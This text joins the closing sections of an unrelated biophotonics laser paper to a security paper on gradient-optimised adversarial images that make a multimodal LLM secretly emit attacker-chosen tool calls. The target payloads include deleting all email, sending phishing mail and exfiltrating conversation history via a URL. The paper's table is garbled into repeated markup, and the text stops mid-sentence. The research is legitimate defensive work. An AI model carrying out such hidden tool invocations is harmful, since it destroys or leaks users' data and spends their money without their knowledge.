Our FNWC may be generalized to other pp-FCPA lasers (Table S1) with \(f\)-independent emission spectrum (Fig. 1c, top). In contrast to commercial alternatives such as an OPA or OPO, FNWC can independently and widely tune \(\lambda,f,\) and \(\tau\) (Tables S4, S5). There is room to further improve the existing FNWC technology. Broader bandwidths of fiber supercontinuum generation at high input powers may be possible if the multimodal behavior at longer wavelengths (\(>\)1120 nm) [12] and the bleed-through of long-wavelength tail of supercontinuum into fiber anomalous dispersion regime (\(>\)1250 nm, Table S3) would not degrade single-mode coherent supercontinuum generation. Also, silica photonic crystal fibers with even larger core, e.g., 100 \(\mu\)m (SC-1500/100-Si-ROD, NKT Photonics) [43], may further increase the peak power for supercontinuum generation and the resulting FNWC output while restrict the LPFG-based photodamage. Finally, the improvement of hollow-core delivery fibers on single-mode low-loss transmission [44], bending tolerance, and polarization maintaining may continue. The unique fiber delivery of spectrally filtered fiber supercontinuum pulses excels at user-friendly and cost-effective operation. First, for pulse parameters (\(\lambda,\)\(f,\) and \(\tau\)) of choice, spectrally monitoring the corresponding deterministically generated fiber supercontinuum ensures day-to-day reproducible optical alignment before the FNWC (Fig. 1a). Second, for a pre-selected spectrum of fiber supercontinuum, monitoring the corresponding fiber delivery output spectrum, power (and plausibly PER), and modal content [45] ensures day-to-day reproducible optical alignment before the application modules (Fig. 2a). Third, the fiber-optic telecommunication-based connection and disconnection of the delivery fiber not only ensures the beneficial feature of laser-microscope alignment decoupling [29], but also enables simple switching or sharing of an integrated pp-FCPA-FNWC laser among multiphoton microscopes [46] or other applications (Fig. 2a). ## 6 Perspectives on adaptive femtosecond photonics We have described a new tunable ultrafast laser (FNWC) suitable for _in vivo_ optical molecular imaging by multiphoton microscopy [47], which is known for overall good performance in 3D sectioning ability, molecular sensitivity/specificity (via fluorescence), and image content (e.g. field of view, spatial resolution, and depth). The label-free variant of multiphoton microscopy [48] lies at the intersection of fluorescence microscopy [49], imaging spectroscopy [50], and label-free nonlinear imaging [51], which gain multicolor image contrasts at the cost of phototoxicity or photodamage, single-frame acquisition speed or signal-to-noise ratio (SNR), and complexity or expense of laser source, respectively (Table S6). Our FNWC may overcome these trade-offs to enable gentle laser-scanning label-free multiphoton imaging spectroscopy at this intersection, by limiting the phototoxicity or photodamage via monitoring wavelength-dependent hyper-fluorescence (i.e. spectroscopic inline phototoxicity indicator) [52], by increasing single-frame acquisition speed or SNR via single-pulse broadband signal generation [53], and by decreasing the complexity or expense of laser source via fiber-optic telecommunication connection or disconnection (Table S6). This may motivate a shift of fluorescence microscopy from wide-field (or light-sheet) to less popular laser-scanning configuration [47], a shift of imaging spectroscopy from optical filters and discrete multispectral channels to less used gratings/prisms and continuous color detection [54, 55] (Table S7), and a shift of label-free nonlinear molecular imaging from molecular vibration [56] to often overlooked auto-fluorescence and harmonics [53]. With free-space output (without the fiber-coupled delivery), the stable supercontinuum generation portion of FNWC allows programmable label-free contrast generation for multiphoton microscopy [29]. The tunable aspect of FNWC will enable fast prototyping or optimization of imaging condition not available from alternative lasers [57]. For multiphoton microscopy with photon order \(n\) (\(>\)1 integer), the signal generation rate scales with \(P^{n}\)/(\(f\tau\))\({}^{n-1}\). Thus, a combined low-\(f\) and short-\(\tau\) excitation condition, i.e., a high duty-cycle inverse (\(f\tau\))\({}^{-1}\), would enhance the signal at a given \(P\), which is limited by laser safety of American National Standards Institute (ANSI). However, one well-known photodamage mechanism also scales with \(P^{\prime}\)/(\(f\tau\))\({}^{-1}\), in which the nonlinear order \(r\) lies between 2 and 3 [58]. Given a two-photon signal of interest (\(n=2\)), the mitigation of this highly nonlinear (\(2<\)\(r<3\)) photodamage demands a low duty-cycle inverse (\(f\tau\))\({}^{-1}\) because \(n<r\). On the other hand, there exists another popular photodamage mechanism that includes two-photon absorption-induced photochemical damage (\(r=2\)) [59] and one-photon absorption-induced photothermal damage (\(r=1\)) [60]. Because \(n\geq r\), the mitigation of this low-\(r\) photodamage demands a high duty-cycle inverse. Thus, the flexibility in \(f\) and \(\tau\) is needed to optimize the signal-to-photodamage ratio for two-photon microscopy, depending on specific biological samples and photodamage mechanisms. It should be noted that our FNWC is not limited to label-free imaging. Due to the relatively high peak-power afforded by our FNWC, its deficiency in two-photon excitation of common fluorophores below 950 nm may be compensated by three-photon excitation across 950-1110 nm. The impact of our FNWC on multiphoton microscopy may be extended to other areas of femtosecond biophotonics (e.g. precision surgery, optogenetics, and laser tweezer) to address the unmet needs of a laser source: i) widely and independently tuned in \(\lambda\), \(f\), and \(\tau\) with sufficient \(P\) or \(E\); ii) easily shared among different applications adaptive to evolving biological interest; and iii) reliably operated in a portable cart plausibly outside an environmentally controlled laboratory. Due to the extensive use of various optical fibers, we believe the resulting ultrafast pulse delivery robust against environmental perturbations may broaden the access to tunable ultrafast laser technology from scientists working in dedicated optical laboratories to diverse users working in real-world situations, e.g., field biologists, neuroscientists, veterinarians, surgeons, and pathologists. **Funding.** National Institutes of Health (R01 CA241618); National Natural Science Foundation of China (81671730, 82171991), and the Special Funds of the Central Government Guiding Local Science and Technology Development (2020L3008). **Data availability.** Major data that support the findings of this study are available within the manuscript.
2310.03185
Misusing Tools in Large Language Models With Visual Adversarial Examples
Large Language Models (LLMs) are being enhanced with the ability to use tools and to process multiple modalities. These new capabilities bring new benefits and also new security risks. In this work, we show that an attacker can use visual adversarial examples to cause attacker-desired tool usage. For example, the attacker could cause a victim LLM to delete calendar events, leak private conversations and book hotels. Different from prior work, our attacks can affect the confidentiality and integrity of user resources connected to the LLM while being stealthy and generalizable to multiple input prompts. We construct these attacks using gradient-based adversarial training and characterize performance along multiple dimensions. We find that our adversarial images can manipulate the LLM to invoke tools following real-world syntax almost always (~98%) while maintaining high similarity to clean images (~0.9 SSIM). Furthermore, using human scoring and automated metrics, we find that the attacks do not noticeably affect the conversation (and its semantics) between the user and the LLM.
Xiaohan Fu, Zihan Wang, Shuheng Li, Rajesh K. Gupta, Niloofar Mireshghallah, Taylor Berg-Kirkpatrick, Earlence Fernandes
2023-10-04T22:10:01Z
http://arxiv.org/abs/2310.03185v1
# Misusing Tools in Large Language Models With Visual Adversarial Examples ###### Abstract Large Language Models (LLMs) are being enhanced with the ability to use tools and to process multiple modalities. These new capabilities bring new benefits and also new security risks. In this work, we show that an attacker can use visual adversarial examples to cause attacker-desired tool usage. For example, the attacker could cause a victim LLM to delete calendar events, leak private conversations and book hotels. Different from prior work, our attacks can affect the confidentiality and integrity of user resources connected to the LLM while being stealthy and generalizable to multiple input prompts. We construct these attacks using gradient-based adversarial training and characterize performance along multiple dimensions. We find that our adversarial images can manipulate the LLM to invoke tools following real-world syntax almost always (\(\sim\)98%) while maintaining high similarity to clean images (\(\sim\)0.9 SSIM). Furthermore, using human scoring and automated metrics, we find that the attacks do not noticeably affect the conversation (and its semantics) between the user and the LLM. ## 1 Introduction Conversational Large Language Models (LLMs) exhibit state-of-the-art performance on tasks that require natural language understanding, reasoning, and problem-solving. To enhance their capabilities, model developers have begun augmenting LLMs with third-party extensions, tools, and plugins (PemAI, 2023; Rajesh Jha, 2023; AutoGPT, 2023; Yury Pinsky, 2023)1 and also with the ability to understand images and sound (OpenAI, 2023c). Furthermore, frameworks like LangChain (LangChain, 2023) and Guidance (Microsoft, 2023a) facilitate development of such integrations. These enhanced LLMs can retrieve up-to-date information from the Internet and achieve more complex tasks such as flight reservations and email management. Footnote 1: For brevity, we refer to all three categories as “tools” in the rest of this paper. Unfortunately, these multimodal tool-enhanced LLMs face new security threats with the broadened resources and privileges they can access -- a misbehaving model now has the potential to affect user resources that are integrated with the LLM. For example, the LLM is able to delete a user's calendar, email sensitive conversation history to the attacker, or cause financial harm to the user by booking hotels. We observe that such problems are more _security-relevant_ (_i.e._, having real impacts on the confidentiality and integrity of user resources) compared to other widely-discussed vulnerabilities such as "jailbreaking" (i.e., an LLM producing content that violates broadly accepted human values). A growing line of work has started exploring attacks on LLMs. For example, textual prompt-injection attacks manipulate the LLM to exfiltrate user data or call integrated tools in ways that are inconsistent with user expectations (Greshake et al., 2023; Samoilenko, 2023). These works embed malicious text instructions on the web, hoping that an unsuspecting user might simply ask the LLM to summarize an attacker-controlled webpage and cause the LLM to accidentally ingest and operate on those instructions. Such attacks are security-relevant but are not stealthy -- a security-conscious user can detect the presence of unrelated instructions by examining the prompt history. Another line of work uses gradient information to compute adversarial examples (Bagdasaryan et al., 2023; Zou et al., 2023) attacking specific prompts. For instance, Bagdasaryan et al. (2023) show that when the user enters a pre-defined prompt (_e.g.,_ "describe the image") together with the adversarial image, a multimodal LLM will output attacker-specified text (_e.g.,_ "From now on I will always mention the word: cow"). This style of attack only works for the specific prompt they are optimized on, but not for any other general user inputs. It is also not stealthy because the response of the LLM is unexpected. Furthermore, it is not security-relevant because user resources are unaffected. However, it does show the potential of utilizing non-text modalities to stealthily embed malicious instructions that could manipulate a user's external resources. Motivated by the above discussion, we observe the following gap -- existing attacks are not security-relevant _and_ stealthy. Our work closes the gap in the attack space by proposing a white-box image-based attack against multimodal LLMs. Attackers can craft trojan-like images that instruct the victim LLM to invoke some attacker-specified tools or external API calls. Figure 1 presents an example of our attack. We observe that the adversarial image looks normal and the conversation remains reasonable and natural across different user inputs. Also, observe that the attack "harms" the user by abusing the email tool. Specifically, our attack has the following properties: * **Tools-abusing:** The attack manipulates the LLM into taking sensitive actions on a user's resources (_e.g.,_ deleting a user's mailbox) by invoking integrated tools in complex and non-natural-language syntax precisely. This makes it security-relevant. * **Stealthy:** A security-conscious user examining the input prompt will not be able to easily determine whether an attack can occur because the image has imperceptible perturbations. Furthermore, the attack remains stealthy _after_ the LLM ingests the prompt because the attack maintains response utility (i.e., the conversation between the user and the LLM remains reasonable, natural, and indistinguishable from conversations when _no_ attack is present). * **Generalizable:** The attack works across different prompts that can be both, related and unrelated to the image. This is important because in the real world, a prompt is under the user's control. An attack should not assume specific prompts. We observe that our attack does not violate safety alignment. Using tools/plugins is a natural and expected behavior of LLMs. Our work also highlights an important shortcoming in current definitions of alignment -- most current efforts focus on broadly applicable human values. Yet, user- and task-specific misalignment can occur through attacks like ours. Detecting and preventing such Figure 1: An example of our attack. The benign-looking adversarial image manipulates the model to generate malicious tool invocations (in red) as we specified under different conversation contexts in addition to a normal response. The tool invocation text will not be printed out in practice since they will be directly processed as function calls (see ChatGPT). misalignments requires fine-grained information about a specific user's intentions that is typically unavailable during alignment efforts using current techniques e.g., RLHF (Stiennon et al., 2020). To achieve the aforementioned properties of our attack, we adopt traditional gradient-based adversarial training (Goodfellow et al., 2014) that optimizes the adversarial image in a continuous space. First, we design a training loss that decomposes the generation objective in order to maintain normal conversation responses while injecting malicious tool usage. We also incorporate an image regularization term to control the adversarial image quality. This novel loss function balances between image and response stealthiness and success rate on making function calls/tool invocations. Second, we construct prompt-response training pairs to enable attack generalization to unseen prompts. We query GPT-4 to generate image-related questions and acquire image-unrelated questions from the Alpaca instruction dataset (Taori et al., 2023), and obtain responses from the target model. **Contributions. (1)** We propose a stealthy, security-relevant white-box attack that causes multimodal LLMs to invoke attacker-desired tools. These attacks have real impacts on the confidentiality and integrity of user resources. These attacks close a gap in the literature relating to realistic attacks on LLMs. **(2)** We characterize the performance of this attack using both human-based and automated metrics for stealthiness and success rates (see details in Section 4). ## 2 System and Threat Model The attacker targets a user and their victim LLM that is integrated with tools. The LLM is trained to generate text following specific tool invocation syntax with arguments it infers from the user. A framework wrapping the LLM will proactively scan the model outputs and execute the tool accordingly when a syntax match is found (e.g., ChatGPT, Microsoft Semantic Kernel). This segment of text for tool invocation will not be printed out and is unseeable by users. We assume that the user and the victim LLM are benign, similar to Greshake et al. (2023); Samoilenko (2023). Note that this setting is distinct from attacks where the users are malicious such as Zou et al. (2023) and Maus et al. (2023). The attacker's motivation is to manipulate the confidentiality and integrity of user resources that are connected to the LLM. For example, the attacker could cause financial harm to a user by reserving hotels or could delete user data. We further assume that the attacker has white-box access to the (weights of) victim LLM. This assumption is reasonable as there are a range of open-source LLMs (e.g., LLama, Vicuna, StarCoder). Furthermore, recent work has demonstrated the black-box transferability of attacks to closed models like GPT and Bard (Zou et al., 2023; Qi et al., 2023). While we do not examine the transferability of our attacks, we observe that it is important future work. There are several methods to deliver the attack to the user. For example, the attacker may share the adversarial image on social media and lure users to play with it _e.g._, "Try "Describe this image" on your LLM" or they may embed the adversarial image in webpages that could be read by LLM accidentally while browsing the Internet. At this point, the attack image is injected into the victim LLM. A successful attack must achieve the attacker-desired tool abuse and must also satisfy the following properties to be disguised enough for a long-lasting spread: (1) _Stealthy_, the image appears benign to a human and the conversation should have good response utility (i.e., the conversation with the attack present should remain reasonable and natural, and indistinguishable from clean conversations with humans) and (2) _Generalizable_, the attack should work across a range of input prompts. We differentiate our work from existing "jailbreaking" attacks by noting that the effect of our attack directly manipulates user resources that are connected to the victim LLM. Existing jailbreaking attacks are typically concerned with breaking safety alignment and causing the LLM to produce content that violates broadly accepted human values. More related work is discussed in Appendix A.1. ## 3 Adversarial Image Optimization The goal of our attack is to find an adversarial image that can stealthily trigger attacker-desired malicious tool invocation while being able to generalize to any prompt that a user might provide. Our attack uses the insight that in a multimodal LLM, the image prompt is vulnerable to gradient-based adversarial training that optimizes in continuous space (Goodfellow et al., 2014). In this section, we discuss the design of the training objective that balances stealthiness and attack success rate. In Section 4.1, we discuss how to construct a prompt-response training set to achieve the generalization property of our attack. ### Attack Variants We consider five attacks with distinct attack objectives corresponding to five different levels of complexity in terms of the required instructions for tool invocation. We list the details of these attack objectives in Table 1. For the first three attack objectives _i.e.,_ delete_email, send_email, send_email_hard, the invocation instructions have similar syntax (same prefix and keyword arguments) but with an increasing number of non-natural-language texts required, which indicates an increasing difficulty in producing these attacks in our assumption. The instructions here follow the function call syntax specified by Microsoft (2023b). For the fourth attack objective book_ticket, the instruction is a more complicated JSON with many special characters in syntax and is more challenging. This instruction follows the call syntax of ChatGPT to the Expedia plugin. For the last attack objective md_url_query, the instruction involves a component (the query string in the URL) that is a copy and URL-encoded version of the previous user inputs representing the conversation history. Such copy and encoding behavior is extremely difficult for the LLM to produce and makes this attack objective the most challenging out of these five. The syntax here follows a standard markdown image href that is supported by ChatGPT natively, as inspired by Samoilenko (2023). ### Attack Objective As shown in in Figure 2, our attack targets mainstream off-the-shelf multimodal LLMs that respond with text or intrinsic instructions for tool invocation based on text and image prompts. Let \(M\) denote the LLM, \(\{c,x,y\}\) represents an input-output tuple. Generally, \(M\) takes the input of a text prompt \(c\), image \(x\) and outputs a response sequence \(y=M(c,x)\) through a search algorithm (e.g. beam search or sampling) based on the trained probabilistic model. The attack goal is to train a small perturbation \(\delta\) to apply to the original image so that the model generates certain outputs specified by the attacker, namely, gives a desired output \(y^{\prime}=M(c,x+\delta)\). To camouflage our attack, \(y^{\prime}\) is constructed by the concatenation of the normal response \(y\) and \(y_{adv}\), a malicious instruction that the attacker intends to trigger. Generally speaking, the training objective can be written as minimizing the negative log probability of generating target \(y^{\prime}\), parameterized by model weights \(\theta\colon-\log P_{\theta}(y^{\prime}|c,x+\delta)\). \begin{table} \begin{tabular}{l l} \hline \hline Attack Objective & Target Tool Invocation Instruction \\ \hline delete\_email & \textless{}**function.delete\_email** which="all"\textgreater{} \\ send\_email & \textless{}**function.send\_email** input="I wish your a merry \\ & \textless{} Christmas\textgreater{} to="hacker@@mail.com"\textgreater{} \\ send\_email\_hard & \textless{}**function.send\_email\_hard** input="Free Costco \\ & \textgreater{} Membership, click here \\ & \textgreater{} [https://tinyurl.com/nhyd@rb4](https://tinyurl.com/nhyd@rb4)* \\ & \textgreater{} to="[email protected]"\textgreater{} \\ book\_ticket & REQUEST TO EXEDBIA \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{}\\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{}\\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{}\\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{}\\ & \textgreater{} \\ & \textgreater{}\\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{} \\ & \textgreater{}\\ & \textgreater{} ### Attack Stealthiness Trade-off The stealthiness of our attack is two-fold: (1) the attack image should look similar to the original one and, (2) apart from the attack payload for tool invocations, the text response should otherwise be a reasonable reply to the prompt. Intuitively, achieving stealthiness inevitably harms the attack success rate. So we introduce how the trade-off is performed in our objective function. To ensure the quality of the adversarial image, \(\delta\) needs to be as small as possible. We apply an additional \(l_{2}\) normalization term to the objective, which is technically equivalent to the Projected Gradient Descent attack (Madry et al., 2017) that projects the gradient term onto an \(L_{p}\) norm boundary. Note that the \(l_{2}\) norm of \(\delta\) is computed with regard to each color channel separately and is controlled by \(\lambda_{i}\). The objective of adversarial training is then written as: \[\min_{\delta}\,-\log P_{\theta}(y^{\prime}|c,x+\delta)+\lambda_{i}||\delta|| \tag{1}\] In the current loss function, we are using a hard target of \(y^{\prime}=[y;y_{adv}]\) to ensure response stealthiness. It is challenging because \(y_{adv}\) is mainly non-natural syntax and forcing the output to contain exactly the normal response \(y\) can make convergence difficult or can harm the stealthiness of \(\delta\). In real-world conversational systems, users will tolerate various responses to their prompts as long as they seem natural and reasonable. However, users can easily sense something is wrong if the injected malicious instruction cannot fully comply with the format of function calls. This failure will make the attack tokens appear in the rendered model response. To minimize the chances of this happening, we reduce the contribution of the loss term corresponding to \(y\) (i.e., the normal response to the user's prompt). We modify (1) and weight the cross entropy loss for \(y\) and \(y_{adv}\) separately as: \[\min_{\delta}\,-\log P_{\theta}(y_{adv}|y,c,x+\delta)-\lambda_{r}\log P_{ \theta}(y|c,x+\delta)+\lambda_{i}||\delta||. \tag{2}\] In the equation, the log probability of generating the adversarial instruction \(y_{adv}\) is conditioned on both the prompt and the normal response. We use \(\lambda_{r}\) to control the trade-off of the supervision from the ground truth response. We summarize the architecture of our attack in Figure 2. **Training Details.** To effectively train \(\delta\) so that it can be generalized to all of the text prompt sequences, we create a training dataset \(\mathcal{D}\) containing multiple pairs of \(\{(c_{j},y_{j})\}\), where \(y_{j}\) is the normal response of \(M\) given prompt \(c_{j}\) and \(x\). The objective is to optimize all the prompts jointly: \[\min_{\delta}\,\frac{1}{|\mathcal{D}|}\sum_{j}^{|\mathcal{D}|}(-\log P_{ \theta}(y_{adv}|[c_{j};y_{j}],x+\delta)-\lambda_{r}\log P_{\theta}(y_{j}|c_{j },x+\delta))+\lambda_{i}||\delta||. \tag{3}\] We introduce the details of how we construct \(\mathcal{D}\) in Section 4.1. We adopt Adam optimizer (Kingma and Ba, 2014) to solve the optimization problem for acceleration and better results. The learning rate of the optimizer is denoted as \(\alpha\) and tuned in our experiments, while the other hyperparameters in the optimizer are left as default (\(\beta_{1}=0.9\) and \(\beta_{2}=0.999\)). Figure 2: Overall architecture of our attack method. We train the targeted image using gradient-based optimization, and separate the loss term into three components, aiming at keeping perturbations imperceptible, maintaining response utility, and achieving malicious behavior respectively. Evaluation To evaluate the attack, we need to measure how well it generates tool invocation syntax according to the attacker's intentions (success rate for different attack variants), the stealthiness of the attack (both image stealthiness and response utility), and the generalization of the attack to unseen prompts. We test the attack on an open-sourced multimodal LLM -- LLaMA Adapter (Zhang et al., 2023). In brief, LLaMA Adapter encodes an image into a sequence of representations, which are treated as tokens and appended to the text input, such that token generation would be conditioned on the image. From now on, we refer to LLaMA Adapter as the _model_. Note that our attacks are only applied to the image part of the input prompt. For our attack method, we set \(\alpha=0.01,\lambda_{i}=0.02,\lambda_{r}=1.0\) and train for 12000 steps with a batch size of 1. Details on how the numbers are picked are in Appendix A.6. We observed significant randomness during adversarial image training. In some cases, different trials (where the only difference is the random seed) can lead to an almost perfect attack and a completely failed attack. Therefore, for all experiments, we report the best result among three trials since attackers will always choose the best-performing adversarial image. We apply our attack method to three different base images to demonstrate the robustness of our attack across various images. Image sources and preprocessing details are in Appendix A.2. ### Dataset Construction To evaluate the generalizability of our attack, we create prompt datasets for training and evaluation independently under two categories: (1) prompts that are related to images (image-related) and (2) prompts that are unrelated to images (image-unrelated). For training, the image-related prompts are obtained by querying GPT-4 with the prompt: "Generate 100 questions related to an image". These questions are applicable to any general image, but the responses should be varied and specific to each image. The image-unrelated prompts are the first 3200 questions in the Alpaca instruction following dataset (Taori et al., 2023). For testing, we consider an in-domain generalization setup where the image-related prompts are created by a human volunteer instructed to create 50 different prompts similar to the prompts in the training set and the image-unrelated prompts are a disjoint set of 100 questions in the Alpaca dataset. Additionally, to test out-domain generalization, we create an out-domain test set. For the image-related prompts, we first generate a textual summary of the image through Bard, and then prompt GPT-4 with the summary and ask it to generate 50 questions given the image summary. Note that the questions for each image would be different in this case. For the image-unrelated prompts, we prompt GPT-4 to generate 50 general questions. Note that for the instructions from the Alpaca dataset, we omit prompts that contain an input section, and prompts that are too long, to keep most generations under a reasonable length of 128 tokens to speed up training. This leaves us 1803 out of 3200 image-related prompts for training, and 64 out of 100 image-unrelated prompts for evaluation. Since the training set size of unrelated prompts is much larger than the related prompts, during training, we mix them with a ratio of \(85:15\). ### Metrics We feed our adversarial images to the model against prompts in the test datasets and obtain one response for each prompt. To evaluate the success and stealthiness of our attack, we consider three measures: the fraction of cases where the model emits a tool usage instruction in the response according to the attacker's intent (success rate), the similarity between the perturbed image and the clean image (image stealthiness), and the indistinguishability between the model responses with and without the attack present in terms of being reasonable and natural (response utility). **Attack Success.** A successful attack would require an exact reproduction of the tool invocation instruction (exact match). However, a tool invocation may be produced with correct syntax but wrong arguments and fail (syntax match). We measure and report the _proportion_ of these two cases among all tested prompt-response pairs as two metrics: * **Syntax.** Syntax match checks whether the tool invocation instruction in the generated response follows the correct syntax. The syntax here refers to a sequence of characters that is specific to each tool. For example, in delete_email attack the correct syntax consists of the tool name function.delete_email and a string argument which="", wrapped by a pair of angle brackets. When the syntax is matched, the LLM will execute the tool with the arguments provided -- whether the execution is exactly following the attacker's intention depends on whether the arguments are precise. Failed syntax matches _e.g.,_ wrong or partial function/argument keywords, will not be parsed by the LLM, and those texts will be printed out and be seen by users. * **Exact.** Exact match measures whether the generated instruction in the response is exactly the same as the desired tool invocation instruction. Note that an exact match is _always_ a syntax match. **Image Stealthiness.** We measure the visual difference between the perturbed adversarial image and its original. The more similar the two images are, the better the stealthiness of the attack. We use the popular Structural Similarity Index Measure (SSIM) to quantify the similarity between the two images. An SSIM score of \(\geq 0.9\) is typically not distinguishable to humans: an example is shown in Appendix A.3. **Response Utility.** By definition, this is best measured by humans' opinions on whether the conversation between the user and model looks reasonable and natural. However, we also consider several automated metrics since human annotations may not be possible in large-scale experiments _e.g.,_ our in- and out-domain test sets. These automated metrics all rely on responses generated with no attack present to compare against.2 Note that the response represents what a user sees in the conversation -- a tool invocation with _correct_ syntax is invisible to users and thus is excluded in the response. Footnote 2: We tried to use other multimodal LLMs to imitate the human annotation but failed with poor results. Commercial ones like Bard are better but have not yet granted us API access. Leave as future work. * _Human Preference (Human)._ We ask human annotators to judge whether a response is natural and reasonable with respect to the question and the original clean image. Each prompt-response pair is judged by three graduate students majoring in Computer Science unrelated to this project and we obtain the final result with a majority vote to get rid of unusual preferences. The annotation guidelines can be found in Appendix A.4. * _Untacked Image Loss (Loss)._ For each question and a response, we obtain the (self-supervised) cross-entropy loss of the response given the question as a prefix, evaluated on the unattacked image. This loss measures how natural the clean model believes the response is. * _GPT-4 Selection (Selection)._ We additionally generate three responses with no attack present (clean) and mix them with the response with the attack present (attacked). We then query GPT-4 to identify the most different text among the four. The random guess rate is 25% -- an accuracy higher than that indicates GPT-4 can distinguish the clean responses from the attacked responses. The prompt we used is in Appendix A.4. * _BLEU/Rouge Scores._ We measured the BLEU/Rouge scores between the above-mentioned attacked responses and the three clean responses. Both scores measure the n-gram overlap between a text sequence and a list of reference text sequences and are widely used in machine translation and summarization, respectively. For Rouge scores, we utilized Rouge-1, Rouge-2, and Rouge-L scores as three different metrics. Figure 3: Illustration of various cases of attacks. Note that the texts marked in red, same as in Figure 1, are tool invocations that will not be printed out and are invisible to users. ### Human Evaluation of Response Utility We are interested in how well our attack works from human perspectives in general and how closely the automated response utility metrics represent human preference. To understand these questions, we conduct a human evaluation on a subset of the responses from the experiment in Table 4. The subset is randomly sampled such that we have one response with the attack present for every 214 questions in the in-domain test set.3 We collect one response for each such sampled question with no attack present as a baseline reference. Footnote 3: 50 image-related questions for 3 images and 64 image-unrelated questions. **Analysis of Disagreements among Human Annotators.** The Cohen Kappa inter-annotator scores between (pairs of) annotators are in the range of 0.2 - 0.4. This indicates a certain, but not high, agreement between annotators, which is reasonable because annotators can interpret naturalness differently. As an alternative metric, we calculate the percentage of questions that annotators find the response with the attack present better than the clean response. This percentage is less than 7%, 